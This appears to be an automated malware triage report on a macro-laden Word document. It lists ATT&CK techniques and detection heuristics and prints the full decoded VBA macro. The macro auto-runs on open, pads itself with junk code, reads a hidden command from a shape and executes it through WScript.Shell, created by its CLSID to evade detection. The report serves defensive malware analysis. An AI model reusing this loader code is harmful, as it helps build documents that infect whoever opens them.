Verdict: MALICIOUS (Risk Score: 292)
Malware Insights
MITRE ATT&CK techniques:
- T1059.001 PowerShell
- T1218.011 System Binary Proxy Execution: Rundll32
- T1059.003 Windows Command Shell
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample contains VBA macros that utilize the dangerous `WScript.Shell` COM object to execute a command. This command, when deobfuscated, reveals a PowerShell execution that attempts to download and run a second-stage payload from a series of concatenated URLs. The AutoOpen macro and the use of `GetObject` further indicate malicious intent.
Heuristics (10)
- ClamAV: Doc.Malware.Powload-6827912-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Powload-6827912-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID [critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS]: VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched lines in script:
    Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW)
    On Error Resume Next
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
  Matched lines in script:
    Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW)
    On Error Resume Next
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro
  Matched lines in script:
    Attribute VB_Customizable = True
    Sub AutoOpen()
    On Error Resume Next
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]: Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell [high, SC_STR_POWERSHELL]: Reference to PowerShell
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6016 bytes | 0ed6b60cad437bf6943637c3a8daafd40264f30952169cf6a3a945ba617d67f3 | ClamAV: No threats found | likely: 86 of 141 identifiers look randomly generated (e.g. 'jkjQbdJDi'), consistent with name-mangling obfuscation. |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "TMrkPlA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case nKCHWu
Case 314225553
REIvv = Hex(zUhjZC)
zLERQX = Cos(223964602)
TRaUEzfE = 121763573
Case 261518072
NWLPpZiXX = Hex(DqCRzowwq)
XNSzm = Sqr(223708615 / CSng(181299475 - Cos(281463566 - 125198893) + POvdow + Rnd(258247617 - 319174944)))
rizKjP = Hex(YCFJhGc)
End Select
On Error Resume Next
Select Case zwoNG
Case 175550103
OjidKi = Hex(ajmBhFp)
uTjzrzwnw = Cos(34375498)
wLztpw = 271314414
Case 2477364
MFwnwdf = Hex(ninjPCD)
dGjNSsf = Sqr(157609371 / CSng(284911953 - Cos(210719433 - 79748993) + pzCsFLi + Rnd(270457525 - 148455809)))
BOTSAQRji = Hex(vYLrG)
End Select
On Error Resume Next
Select Case jzZDIfY
Case 195887290
AwWjQ = Hex(ZGvVbBjTo)
biaFh = Cos(193137214)
iGfKwiAFk = 58605975
Case 33648512
rWsDK = Hex(kziYZz)
ltjzzYbX = Sqr(325855887 / CSng(258592911 - Cos(169270936 - 245164906) + aXuQqtbP + Rnd(320535881 - 260502099)))
iPlwiQKh = Hex(iNpTHnkd)
End Select
On Error Resume Next
Select Case PiKkVEipj
Case 169513881
mltLbKS = Hex(VOXWEUIM)
EzAhX = Cos(157456631)
VifkDSN = 341237409
Case 288827828
ZBYpn = Hex(fLMir)
FPNsb = Sqr(240342036 / CSng(216209631 - Cos(164769068 - 325076552) + NOptfh + Rnd(238957300 - 18318955)))
XiwvH = Hex(NQvUVKpm)
End Select
Set PXLqdSS = Shapes("wwUiYjcaM")
On Error Resume Next
Select Case jVuRGc
Case 62975910
OhFPhXiJ = Hex(CzLPSSjn)
AzPhiER = Cos(62599017)
vVsSjNXwH = 206288411
Case 19593862
qrMhqCuDQ = Hex(LdfcL)
jwBwYi = Sqr(230745325 / CSng(259993889 - Cos(315343634 - 240069568) + wrVKEk + Rnd(208270630 - 62137329)))
DArBW = Hex(csKOn)
End Select
bJiwwc = "" + PJdEX + ZlGow + PXLqdSS.TextFrame.TextRange.Text + sHtzSFOj + bSCqdhzG
On Error Resume Next
Select Case SIPDRL
Case 3167370
crkhNzpf = Hex(YosbO)
NAojTi = Cos(67262469)
uqauE = 185140920
Case 247657338
DrdOSll = Hex(ANzSlK)
nEvCD = Sqr(187028664 / CSng(187816416 - Cos(218873350 - 15570860) + mprnEl + Rnd(25299906 - 104988147)))
lAzzu = Hex(OXjFkrT)
End Select
On Error Resume Next
Select Case ncqplKbzk
Case 47971642
uohiJWNpl = Hex(jzPUYPQ)
ClvTLF = Cos(335759634)
khvhCdW = 212062023
Case 259993361
cINfBqj = Hex(HdaUMu)
fiVCac = Sqr(188008983 / CSng(233023080 - Cos(222599312 - 251266400) + tDbCdjhB + Rnd(257995448 - 53173411)))
WkFjv = Hex(VAPUAVWvA)
End Select
On Error Resume Next
Select Case OYuCKE
Case 179509213
dfDrP = Hex(wKOZwJ)
PXsNbsaIA = Cos(112736752)
FSkEZV = 227034674
Case 233707858
pzMvubAt = Hex(vPDiOzBCp)
MAucOomz = Sqr(182348749 / CSng(289622094 - Cos(242573929 - 294252594) + MXKPLzSAs + Rnd(215963956 - 75948399)))
BKWDk = Hex(XfzXk)
End Select
On Error Resume Next
Select Case YVqZM
Case 64247105
AtWwwC = Hex(mjhJc)
aTrIWGwT = Cos(270714333)
Qhrch = 266697035
Case 176200267
szQzhSs = Hex(LoibCJsG)
EiiDFNw = Sqr(72590518 / CSng(246730006 - Cos(43646092 - 117618199) + ZVwFL + Rnd(110925152 - 192901146)))
amYQmv = Hex(kNFHo)
End Select
Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW)
On Error Resume Next
Select Case LVKwXLD
Case 328464014
zYlSCUUD = Hex(XoobltXt)
zPJXN = Cos(170814519)
wSYZFCFFW = 314369590
Case 316532397
JGYwrzr = Hex(jkjQbdJDi)
ZLLTGBv = Sqr(200172338 / CSng(200427274 - Cos(136924903 - 232792512) + EpzzjvaR + Rnd(120748192 - 157310558)))
iSLiHwb = Hex(BXwVkMqAX)
End Select
Const RkXlasdp = 0
On Error Resume Next
Select Case njENW
Case 311023780
qVqRGRWMO = Hex(jcuEOXCL)
RwYcka = Cos(66799475)
vfOaTTFI = 216999679
Case 61465550
UVGrIzkOV = Hex(ZJCCCdzRs)
qwiaj = Sqr(151900 / CSng(94634990 - Cos(89436676 - 60511179) + vhNFqwKG + Rnd(107251246 - 206791666)))
LolWW = Hex(YQpFro)
End Select
On Error Resume Next
Select Case zaZEpYOS
Case 223804275
jtfWj = Hex(XiWCYjfia)
ZicjQu = Cos(41803654)
iuXTbl = 106620847
Case 219313503
WqsmVSpw = Hex(oCOOv)
dczfpBppm = Sqr(96221498 / CSng(261634855 - Cos(266057239 - 122579271) + Clmrz + Rnd(56286925 - 263473732)))
aEQnjOFD = Hex(Uzcpz)
End Select
On Error Resume Next
Select Case oUukq
Case 35752782
PjSva = Hex(XaGoBTZB)
zsCiO = Cos(202743273)
JWzKFUzSC = 12630467
Case 274492885
zYkCAjINi = Hex(fLwFlUCh)
qZQXvz = Sqr(105082529 / CSng(214283243 - Cos(23509120 - 179741470) + mzdZCdPp + Rnd(15470181 - 309503076)))
RPbqm = Hex(AiiQUp)
End Select
sTriKPpEu.Run# bJiwwc, RkXlasdp
On Error Resume Next
Select Case aPMLWNp
Case 182459235
bQpbAUtZm = Hex(wzlzutpwt)
bYzOaj = Cos(158523348)
lzWOQLY = 3831224
Case 143716721
wnDEU = Hex(kipSRS)
QwLWCRaA = Sqr(108130003 / CSng(318683607 - Cos(103459751 - 263237476) + ajiZYuXl + Rnd(4674533 - 39131188)))
XEoivu = Hex(LTPGS)
End Select
End Sub